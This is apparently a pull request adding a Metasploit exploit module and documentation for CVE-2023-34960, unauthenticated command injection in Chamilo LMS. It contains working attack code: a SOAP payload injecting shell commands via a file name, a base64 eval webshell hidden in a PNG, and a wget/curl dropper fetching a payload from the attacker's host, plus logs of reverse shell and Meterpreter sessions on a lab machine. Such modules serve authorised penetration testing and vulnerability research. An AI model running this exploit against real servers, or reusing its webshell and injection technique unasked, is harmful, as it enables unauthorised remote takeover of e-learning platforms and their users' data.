### PR TITLE
Chamilo unauthenticed RCE [CVE-2023-34960]

### DIFF
--- a/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
+++ b/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
@@ -1,0 +1,168 @@
+## Vulnerable Application
+`Chamilo` is an e-learning platform, also called Learning Management Systems (LMS).
+This module exploits an unauthenticated remote command execution vulnerability that affects Chamilo versions `1.11.18`
+and below. See [CVE-2023-34960](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34960).
+Due to a functionality called `Chamilo Rapid` to easily convert PowerPoint slides to courses on Chamilo,
+it is possible for an unauthenticated remote attacker to execute arbitrary commands at OS level using a malicious SOAP
+request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
+
+Read this [article](https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960) on attackerkb.com for more details.
+
+This module has been tested on:
+- [ ] Ubuntu Linux 22.04
+* Chamilo 1.11.18
+* PHP 7.4
+
+**Instructions for an Chamilo installation on Ubuntu 22.04:**
+Download and install Ubuntu 22.04 server on VirtualBox.
+[Follow these instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/).
+
+Download and install LAMP on Ubuntu 22.04 server.
+[Follow these instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/).
+
+Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases).
+
+Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites).
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter`
+```
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > options
+
+Module options (exploit/linux/http/chamilo_unauth_rce_cve_2023_34960):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
+                                         cs/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The Chamilo endpoint URL
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
+                                        local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+   When TARGET is 0:
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generat
+                                        ed if left unset.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+```
+## Options
+
+### TARGETURI
+The uripath to the `Chamilo` web application. Default set is to `/`.
+
+### WEBSHELL
+You can use this option to set the filename and extension (should be .php) of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+## Scenarios
+### Ubuntu 22.04 PHP - php/meterpreter/reverse_tcp
+```
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.47:80 can be exploited.
+[+] The target is vulnerable.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.47
+[+] Deleted cfLzNvTgdlp.php
+[*] Meterpreter session 23 opened (192.168.201.10:4444 -> 192.168.201.47:42220) at 2023-07-28 20:29:19 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+### Ubuntu 22.04 Unix Command - cmd/unix/reverse_bash
+```
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > set target 1
+target => 1
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.47:80 can be exploited.
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 24 opened (192.168.201.10:4444 -> 192.168.201.47:32810) at 2023-07-28 20:30:48 +0000
+
+uname -a
+Linux cuckoo 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+### Ubuntu 22.04 Linux Dropper - linux/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > set target 2
+target => 2
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.47:80 can be exploited.
+[+] The target is vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/hexZf4ppmqBlG
+[*] Client 192.168.201.47 (Wget/1.21.2) requested /hexZf4ppmqBlG
+[*] Sending payload to 192.168.201.47 (Wget/1.21.2)
+[*] Sending stage (3045348 bytes) to 192.168.201.47
+[*] Meterpreter session 25 opened (192.168.201.10:4444 -> 192.168.201.47:55508) at 2023-07-28 20:32:02 +0000
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 192.168.201.47
+OS           : Ubuntu 22.04 (Linux 5.15.0-76-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/var/www/html/chamilo/main/inc/lib/ppt2png
+meterpreter >
+```
+
+## Limitations
+No limitations.

--- a/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
+++ b/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
@@ -8,21 +8,14 @@ request at the vulnerable endpoint `/main/webservices/additional_webservices.php
 
 Read this [article](https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960) on attackerkb.com for more details.
 
-This module has been tested on:
-- [ ] Ubuntu Linux 22.04
-* Chamilo 1.11.18
-* PHP 7.4
+This module has been tested against Chamilo 1.11.18 on Ubuntu Linux 22.04 with PHP 7.4
 
-**Instructions for an Chamilo installation on Ubuntu 22.04:**
-Download and install Ubuntu 22.04 server on VirtualBox.
-[Follow these instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/).
-
-Download and install LAMP on Ubuntu 22.04 server.
-[Follow these instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/).
-
-Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases).
-
-Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites).
+### Installation
+Instructions for a Chamilo installation on Ubuntu 22.04:
+1. Download and install Ubuntu 22.04 server on VirtualBox (follow these [instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/)).
+2. Download and install LAMP on Ubuntu 22.04 server (follow these [instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/)).
+3. Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases).
+4. Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites).
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
+++ b/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
@@ -23,6 +23,7 @@ Instructions for a Chamilo installation on Ubuntu 22.04:
 - [ ] `use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960`
 - [ ] `set rhosts <ip-target>`
 - [ ] `set rport <port>`
+- [ ] `set lhost <ip-attacker>`
 - [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
 - [ ] `exploit`
 - [ ] you should get a `reverse shell` or `Meterpreter`

--- a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
+++ b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
@@ -1,0 +1,224 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Format::PhpPayloadPng
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Chamilo unauthenticated command injection in PowerPoint upload',
+        'Description' => %q{
+          Chamilo is an e-learning platform, also called Learning Management Systems (LMS).
+          This module exploits an unauthenticated remote command execution vulnerability
+          that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).
+          Due to a functionality called Chamilo Rapid to easily convert PowerPoint
+          slides to courses on Chamilo, it is possible for an unauthenticated remote
+          attacker to execute arbitary commands at OS level using a malicious SOAP
+          request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
+        },
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Module Author
+          'Randorisec' # Original research
+        ],
+        'References' => [
+          ['CVE', '2023-34960'],
+          ['URL', 'https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities'],
+          ['URL', 'https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['php', 'unix', 'linux'],
+        'Privileged' => false,
+        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'Linemax' => 65535,
+              'CmdStagerFlavor' => ['wget', 'curl', 'printf', 'bourne'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-06-01',
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The Chamilo endpoint URL', '/' ]),
+      OptString.new('WEBSHELL', [
+        false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil
+      ], conditions: %w[TARGET == 0])
+    ])
+  end
+
+  def soap_request(cmd)
+    # create SOAP request exploiting CVE-2023-34960
+
+    # Randomize ppt size
+    ppt_size = "#{rand(720..1440)}x#{rand(360..720)}"
+
+    return <<~EOS
+      <?xml version="1.0" encoding="UTF-8"?>
+      <SOAP-ENV:Envelope
+        xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+        xmlns:ns1="#{target_uri.path}"
+        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+        xmlns:ns2="http://xml.apache.org/xml-soap"
+        xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
+        SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+        <SOAP-ENV:Body>
+          <ns1:wsConvertPpt>
+            <param0 xsi:type="ns2:Map">
+              <item>
+                <key xsi:type="xsd:string">file_data</key>
+                <value xsi:type="xsd:string"></value>
+              </item>
+              <item>
+                <key xsi:type="xsd:string">file_name</key>
+                <value xsi:type="xsd:string">`{{}}`.pptx'|" |#{cmd}||a #</value>
+              </item>
+              <item>
+                <key xsi:type="xsd:string">service_ppt2lp_size</key>
+                <value xsi:type="xsd:string">#{ppt_size}</value>
+              </item>
+            </param0>
+          </ns1:wsConvertPpt>
+        </SOAP-ENV:Body>
+      </SOAP-ENV:Envelope>
+    EOS
+  end
+
+  def check_vuln(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
+      'ctype' => 'text/xml; charset=utf-8',
+      'data' => soap_request(cmd).to_s
+    })
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = if datastore['WEBSHELL'].blank?
+                       "#{Rex::Text.rand_text_alpha(8..16)}.php"
+                     else
+                       datastore['WEBSHELL'].to_s
+                     end
+
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    # inject PHP payload into the PLTE chunk of a PNG image to hide the payload
+    php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
+    png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
+    return nil if png_webshell.nil?
+
+    # encode webshell data and write to file on the target for execution
+    payload = Base64.strict_encode64(png_webshell.to_s)
+    cmd = "echo #{payload}|openssl enc -a -d > ./#{@webshell_name}"
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
+      'ctype' => 'text/xml; charset=utf-8',
+      'data' => soap_request(cmd).to_s
+    })
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'main', 'inc', 'lib', 'ppt2png', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Encode payload with base64 and decode with openssl (most common installed on unix systems)
+    payload = Base64.strict_encode64(cmd)
+    cmd = "echo #{payload}|openssl enc -a -d|sh"
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
+      'ctype' => 'text/xml; charset=utf-8',
+      'data' => soap_request(cmd).to_s
+    })
+  end
+
+  def check
+    # Checking if the target is vulnerable by echoing a randomised marker that will return the marker in the response.
+    print_status("Checking if #{peer} can be exploited.")
+    marker = Rex::Text.rand_text_alphanumeric(8..16)
+    res = execute_command("echo #{marker}")
+    if res && res.code == 200 && res.body =~ /wsConvertPptResponse/ && res.body =~ /#{marker}/
+      CheckCode::Vulnerable
+    else
+      CheckCode::Safe('No valid response received from the target.')
+    end
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :php
+      res = upload_webshell
+      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body =~ /wsConvertPptResponse/
+      register_file_for_cleanup(@webshell_name.to_s)
+      execute_php(payload.encoded)
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager({ linemax: target.opts['Linemax'] })
+    end
+  end
+end

--- a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
+++ b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
@@ -191,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Checking if #{peer} can be exploited.")
     marker = Rex::Text.rand_text_alphanumeric(8..16)
     res = execute_command("echo #{marker}")
-    if res && res.code == 200 && res.body =~ /wsConvertPptResponse/ && res.body.include?(marker)
+    if res && res.code == 200 && res.body.include?('wsConvertPptResponse') && res.body.include?(marker)
       CheckCode::Vulnerable
     else
       CheckCode::Safe('No valid response received from the target.')

--- a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
+++ b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
@@ -191,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Checking if #{peer} can be exploited.")
     marker = Rex::Text.rand_text_alphanumeric(8..16)
     res = execute_command("echo #{marker}")
-    if res && res.code == 200 && res.body =~ /wsConvertPptResponse/ && res.body =~ /#{marker}/
+    if res && res.code == 200 && res.body =~ /wsConvertPptResponse/ && res.body.include?(marker)
       CheckCode::Vulnerable
     else
       CheckCode::Safe('No valid response received from the target.')
@@ -203,7 +203,7 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :php
       res = upload_webshell
-      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body =~ /wsConvertPptResponse/
+      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse')
       register_file_for_cleanup(@webshell_name.to_s)
       execute_php(payload.encoded)
     when :unix_cmd

--- a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
+++ b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
           that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).
           Due to a functionality called Chamilo Rapid to easily convert PowerPoint
           slides to courses on Chamilo, it is possible for an unauthenticated remote
-          attacker to execute arbitary commands at OS level using a malicious SOAP
+          attacker to execute arbitrary commands at OS level using a malicious SOAP
           request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
         },
         'Author' => [

--- a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
+++ b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
               'Type' => :linux_dropper,
               'Linemax' => 65535,
-              'CmdStagerFlavor' => ['wget', 'curl', 'printf', 'bourne'],
+              'CmdStagerFlavor' => ['wget', 'curl'],
               'DefaultOptions' => {
                 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
               }
@@ -132,15 +132,6 @@ class MetasploitModule < Msf::Exploit::Remote
         </SOAP-ENV:Body>
       </SOAP-ENV:Envelope>
     EOS
-  end
-
-  def check_vuln(cmd)
-    return send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
-      'ctype' => 'text/xml; charset=utf-8',
-      'data' => soap_request(cmd).to_s
-    })
   end
 
   def upload_webshell


### PR DESCRIPTION
`Chamilo` is an e-learning platform, also called Learning Management Systems (LMS).
This module exploits an unauthenticated remote command execution vulnerability that affects `Chamilo` versions `1.11.18` and below. See also [CVE-2023-34960](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34960). 
Due to a functionality called `Chamilo Rapid` to easily convert PowerPoint slides to courses on `Chamilo`, it is possible for an unauthenticated remote attacker to execute arbitrary commands at OS level using a malicious SOAP request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.

Read this [article](https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960) on attackerkb.com for more details.

This module has been tested on:
- [ ] Ubuntu Linux 22.04
* Chamilo 1.11.18
* PHP 7.4

**Instructions for an Chamilo  installation on Ubuntu 22.04:**
* [Follow these instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/) to download and install Ubuntu 22.04 server on VirtualBox. 
* [Follow these instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/) to download and install LAMP on Ubuntu 22.04 server. 
* Download Chamilo `1.11.18` release from [here](https://github.com/chamilo/chamilo-lms/releases).
* [Follow these instructions](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites) to install Chamilo.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter`
```
msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > info

       Name: Chamilo unauthenticated command injection in PowerPoint upload
     Module: exploit/linux/http/chamilo_unauth_rce_cve_2023_34960
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x64, x86, aarch64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-06-01

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Randorisec

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.47   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                        s/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /chamilo         yes       The Chamilo endpoint URL
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                      local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  1981             yes       The local port to listen on.


  When TARGET is 0:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generate
                                       d if left unset.

Payload information:

Description:
  Chamilo is an e-learning platform, also called Learning Management Systems (LMS).
  This module exploits an unauthenticated remote command execution vulnerability
  that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).
  Due to a functionality called Chamilo Rapid to easily convert PowerPoint
  slides to courses on Chamilo, it is possible for an unauthenticated remote
  attacker to execute arbitrary commands at OS level using a malicious SOAP
  request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-34960
  https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities
  https://attackerkb.com/topics/gvs0Gv8BID/cve-2023-34960/


View the full module info with the info -d command.
```
## Scenarios
### Ubuntu 22.04 PHP - php/meterpreter/reverse_tcp
```
msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.47:80 can be exploited.
[+] The target is vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.47
[+] Deleted cfLzNvTgdlp.php
[*] Meterpreter session 23 opened (192.168.201.10:4444 -> 192.168.201.47:42220) at 2023-07-28 20:29:19 +0000

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : cuckoo
OS          : Linux cuckoo 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter >
```
### Ubuntu 22.04 Unix Command -  cmd/unix/reverse_bash
```
msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > set target 1
target => 1
msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.47:80 can be exploited.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 24 opened (192.168.201.10:4444 -> 192.168.201.47:32810) at 2023-07-28 20:30:48 +0000

uname -a
Linux cuckoo 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Ubuntu 22.04 Linux Dropper -  linux/x64/meterpreter/reverse_tcp
```
msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > set target 2
target => 2
msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.47:80 can be exploited.
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/hexZf4ppmqBlG
[*] Client 192.168.201.47 (Wget/1.21.2) requested /hexZf4ppmqBlG
[*] Sending payload to 192.168.201.47 (Wget/1.21.2)
[*] Sending stage (3045348 bytes) to 192.168.201.47
[*] Meterpreter session 25 opened (192.168.201.10:4444 -> 192.168.201.47:55508) at 2023-07-28 20:32:02 +0000
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.201.47
OS           : Ubuntu 22.04 (Linux 5.15.0-76-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/var/www/html/chamilo/main/inc/lib/ppt2png
meterpreter >
```
